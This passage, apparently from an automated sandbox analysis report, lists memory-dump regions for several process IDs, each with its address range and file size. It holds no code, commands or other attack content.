                                                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                                              • memory/1968-271-0x0000000004CE0000-0x0000000004D72000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                              • memory/1968-224-0x0000000000040000-0x0000000000060000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                              • memory/1968-278-0x0000000005810000-0x0000000005876000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                408KB

                                                                                                                                                                                                                              • memory/1968-275-0x0000000005550000-0x000000000556E000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                              • memory/1968-319-0x00000000063E0000-0x00000000065A2000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                              • memory/1968-269-0x0000000004C60000-0x0000000004CD6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                              • memory/1968-321-0x0000000006EE0000-0x000000000740C000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.2MB

                                                                                                                                                                                                                              • memory/2016-284-0x0000000000940000-0x0000000000943000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-292-0x00000000009A0000-0x00000000009A3000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-280-0x0000000077CB0000-0x0000000077E53000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                              • memory/2016-283-0x0000000000930000-0x0000000000933000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-286-0x0000000000950000-0x0000000000953000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-279-0x0000000000920000-0x0000000000923000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-290-0x0000000000980000-0x0000000000983000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-287-0x0000000000960000-0x0000000000963000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-288-0x0000000000970000-0x0000000000973000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2016-282-0x00000000761A0000-0x0000000076340000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                              • memory/2016-291-0x0000000000990000-0x0000000000993000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                12KB

                                                                                                                                                                                                                              • memory/2248-206-0x0000000002150000-0x0000000002151000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                              • memory/2504-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                              • memory/2504-195-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-147-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                              • memory/2504-199-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                              • memory/2504-158-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-157-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-145-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                              • memory/2504-156-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-198-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                              • memory/2504-197-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                              • memory/2504-196-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                              • memory/2504-155-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-148-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                              • memory/2504-146-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                              • memory/2504-150-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                              • memory/2504-151-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                              • memory/2504-152-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                              • memory/2504-153-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2504-154-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/2536-251-0x0000000073680000-0x0000000073E30000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                                              • memory/2536-252-0x0000000000C40000-0x0000000000C58000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                              • memory/2636-243-0x0000000002160000-0x00000000021C0000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                384KB

                                                                                                                                                                                                                              • memory/2708-261-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                13.3MB

                                                                                                                                                                                                                              • memory/2752-259-0x0000000002120000-0x00000000021CC000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                688KB

                                                                                                                                                                                                                              • memory/2752-242-0x0000000000608000-0x0000000000674000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                432KB

                                                                                                                                                                                                                              • memory/2752-260-0x0000000000400000-0x00000000004CE000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                824KB

                                                                                                                                                                                                                              • memory/2752-255-0x0000000000608000-0x0000000000674000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                432KB

                                                                                                                                                                                                                              • memory/2772-249-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                584KB

                                                                                                                                                                                                                              • memory/2772-248-0x0000000002140000-0x0000000002184000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                272KB

                                                                                                                                                                                                                              • memory/2772-246-0x00000000004A0000-0x00000000004C7000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                156KB

                                                                                                                                                                                                                              • memory/2884-191-0x0000000005CE0000-0x00000000062F8000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                              • memory/2884-194-0x0000000005600000-0x000000000563C000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                              • memory/2884-193-0x00000000055A0000-0x00000000055B2000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                              • memory/2884-205-0x0000000073680000-0x0000000073E30000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7.7MB

                                                                                                                                                                                                                              • memory/2884-186-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                              • memory/2884-202-0x00000000058A0000-0x00000000059AA000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                              • memory/2884-204-0x00000000056B0000-0x00000000056B1000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                              • memory/3312-247-0x0000000000870000-0x00000000008D0000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                384KB

                                                                                                                                                                                                                              • memory/3880-254-0x00000000022D7000-0x00000000023B6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                892KB

                                                                                                                                                                                                                              • memory/3880-258-0x0000000000400000-0x0000000000632000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.2MB

                                                                                                                                                                                                                              • memory/3880-256-0x00000000023C0000-0x00000000025E6000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                2.1MB

                                                                                                                                                                                                                              • memory/3880-264-0x0000000077CB0000-0x0000000077E53000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                              • memory/3880-325-0x0000000002DB0000-0x0000000003802000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10.3MB

                                                                                                                                                                                                                              • memory/3880-328-0x0000000003960000-0x0000000003961000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                              • memory/3880-330-0x0000000002DB0000-0x0000000003802000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10.3MB

                                                                                                                                                                                                                              • memory/4448-203-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                436KB

                                                                                                                                                                                                                              • memory/4448-172-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                436KB

                                                                                                                                                                                                                              • memory/4920-213-0x0000000000D28000-0x0000000000D8D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                404KB

                                                                                                                                                                                                                              • memory/4920-214-0x0000000000C20000-0x0000000000CBD000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                628KB

                                                                                                                                                                                                                              • memory/4920-215-0x0000000000400000-0x0000000000950000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                5.3MB

                                                                                                                                                                                                                              • memory/4920-200-0x0000000000D28000-0x0000000000D8D000-memory.dmp
                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                404KB